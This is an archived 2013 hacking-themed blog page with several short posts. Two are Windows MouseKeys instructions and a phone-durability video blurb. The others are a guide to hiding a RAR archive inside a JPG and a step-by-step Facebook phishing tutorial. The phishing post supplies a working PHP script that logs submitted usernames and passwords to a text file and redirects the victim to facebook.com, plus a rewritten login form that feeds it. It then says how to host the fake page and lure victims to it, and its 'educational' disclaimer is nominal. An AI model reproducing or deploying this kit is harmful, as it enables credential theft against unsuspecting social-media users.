Archive for April 2013

Use Keyboard as Mouse

Tuesday, April 30, 2013
Posted by Earner
Tag :
If your mouse is not working and you don't wish to wait till you get a new mouse, you would definitely like to know how you can use your keyboard as your mouse. It is easy to use your mouse as keyboard in Windows using the On Screen Keyboard utility, but it is also possible to do the reverse.

All you need to do is:

Windows XP Users:-
  1. Go to Control Panel.
  2. Then click on Switch to Classic View.
  3. Then Click on Accessibility Options.
  4. Then Click on the Mouse Tab.
  5. Select Use MouseKeys.
  6. Click on OK.
  7. Then activate NumberLock (by pressing the NumLock key).
  8. You should hear a beep sound.
  9. Now you can control the mouse pointer using the arrow keys on the numeric keypad.


Windows 8, Windows 7 and Vista Users:
  1. Open Ease of Access Center by clicking the Start button, clicking Control Panel, clicking Ease of Access, and then clicking Ease of Access Center. 
  2. Click Make the mouse easier to use.
  3. Under Control the mouse with the keyboard, select the Turn on Mouse Keys check box.
You can also increase the acceleration and speed of your mouse movements according to your needs.
You can alternately press the Alt+Shift+Num Lock combination to instantly activate the mouse keys.



New launched Samsung Galaxy S4 meets  .50 Caliber Rifle shots.
Want to take a guess what happens when you shoot a phone with a .50 caliber rifle? Not pretty.

Well, drop text is fine to check the to check the build quality of a phone, I just can not justify shooting up a brand new phone to check for what "build quality"?




Source  Youtube

What you need

> WinRAR
> Command Prompt
> Some Image

Follow these steps

1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories > Command Prompt and type following commands in it.
>> cd desktop
5. CD stands for change directory by typing above command you change your directory to desktop. After that type command
>> Copy /b imagename.jpg + filename.rar finalimage.jpg

Replace "imagename.jpg" with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
Replace "filename.rar" with name of your file you want to hide. It must be in .rar format.
Finally Replace "finalimage.jpg" with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.

6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

1. Open winrar
2. Now locate your image and open it or simply drag your image in winrar.
3. Extract the file and done.

Hacking is so common nowadays stay alert otherwise you can become victim of it.
Like our page and prevent yourself to become a victim of someone's hack..:). I will share how to hack, how to prevent yourself from attacks and fun stuff as usual.
Like us now on facebook 




I have implemented my first phishing a way 5 years back, when we used to surf orkut. That was for someone special ;)  but after so many request, i think a ton's of(:p) i am going to share working Phishing  example, if you follow each step then you will succeed.
P.S. This tutorial is just for educational purpose, i really don't want you to hack someone's account.

INTRODUCTION TO PHISHING

According to Wikipedia: Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term "phishing" was made in 1995. The term is a variant of fishing, probably influenced by phreaking, and alludes to "baits" used in hopes that the potential victim will "bite" by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen.

In simple words: By PHISHING we get user login detail by showing the exact page of the that website. This is just making fool of the user. And mostly internet geeks can know that the page is fake.

So now start with PHISHING demonstration on one of your favorite website. i.e. facebook

THINGS WE NEED

Any text editor: I prefer Notepad++
Internet connection
Free or paid hosting service
Little know of HTML

DEMONSTRATION

So, lets start the demonstration of PHISHING with one of your favorite social networking website. And this method will be apply to each website like gmail, yahoo, hotmail, facebook, twitter, flikr, rediffmail, etc which provide the login service.

Let's start with facebook.:)

You can download these files which i have created for phishing purpose or you can follow the steps given below. CLICK HERE TO DOWNLOAD.

Step 1: Register on any free web-hosting website. Some website give cpanel hosting, which is better for PHISHING, so i suggest you to go with
www.0fees.net
www.000webhost.com
byethost.com

And i personally using www.0fees.net. You can choose any one.

Step 2: Now go facebook.com and press Ctrl+U or right click on web page and click view source, copy all the source code and paste it into the new notepad file. P.S. We need the login page of facebook, so if you are logged in, log out and then copy the source code.

Step 3: Now save notepad file with name "index.html" on your desktop or a folder but without the quotes.

Step 4: Now open one more notepad file and copy the below code in it.

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("tpcm.txt", "a");
foreach($_GET as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save it with any "anyname.php", I will save with "login.php", you can put any name that you want but ensure extension is “.php”.
In content there is a file "tpcm.txt", you can put any name to txt which is not guessable. Try to set it unguessable.

Step 5: Open index.html file with notepad or any text editor you prefer, and find(Ctrl+F) keyword “action” there. You will see something like this:
<form id="login_form" action="https://www.facebook.com/login.php?login_a...."
remove this whole <form tag> and replace with this tag.

<form method="GET" action="login.php" id="login_form" onsubmit=";var d = document.documentElement;return d.onsubmit &amp;&amp; d.onsubmit(event);">
<div id="loginform" style=""><table cellspacing="0"><tr><td class="html7magic"><label for="email" id="label_email">Email or Phone</label></td><td class="html7magic"><label for="pass" id="label_pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" id="email" name="email" value="" onkeypress="formchange()" /><td><input type="password" class="inputpassword" id="pass" name="pass" value="" /></td><td><label class="uiButton uiButtonConfirm" id="loginbutton" for="u_0_6"><input value="Log In" tabindex="4" type="submit" id="u_0_6" /></label></td></tr><tr><td class="login_form_label_field"><div><div class="uiInputLabel clearfix"><input id="persist_box" type="checkbox" name="persistent" value="1" tabindex="3" class="uiInputLabelCheckbox" /><label for="persist_box">Keep me logged in</label></div><input type="hidden" name="default_persistent" value="0" /></div></td><td class="login_form_label_field"><a rel="nofollow" href="http://www.facebook.com/recover/initiate">Forgot your password?</a></td></tr></table></div></form>

Save it and close the file.

Step-6: Now upload login.php and index.html file to you hosting directory. If it is cpanel account, upload files into file_manager -> public_html and see the attached screen shot, most of the hosting sites, has same kind of UI.
Click on file manager
Click on htdocs

Select all files

Click Delete

Click on check

Click back
Click Upload
Click choose files
Click on check
You will see something like this




Step 7: Now visit to your website(provided by your hosting mine is  lifeishell.0fees.net) you will see a phishing page of facebook, test it to see if it works or not, and send this link to your victim, say anything like join my network or any social trick and force victim to visit you page and let him/her enter the username and password.
Once he/she enter information, username and password will be save into tpcm.txt file and victim will redirect to facebook’s original link facebook.com. Victim will seems like he did enter wrong username and password so he should enter again, when he again will enter a info, he/she will successfully login into their facebook account.

Step 8: Now go to lifeishell.0fees.net/tpcm.txt and see the username and password of victim. or you can again visit to your cpanel, here in file manager–>public_html you will se a file tpcm.txt, open it to view victim’s username and password.
(This is why i suggested you to give textfile a name which is unguessable).

YOU CAN EVEN CHECK LIVE EXAMPLE HERE.
Site: lifeishell
Password Text FIle: Password

\m/....RocK oN....\m/


Hacking is so common nowadays stay alert otherwise you can become victim of it.
Like our page and prevent yourself to become a victim of someone's hack..:). I will share how to hack, how to prevent yourself from attacks and fun stuff as usual.
Like us now on facebook 
Like and Follow

Popular Post

- Copyright © Hack The Hacker -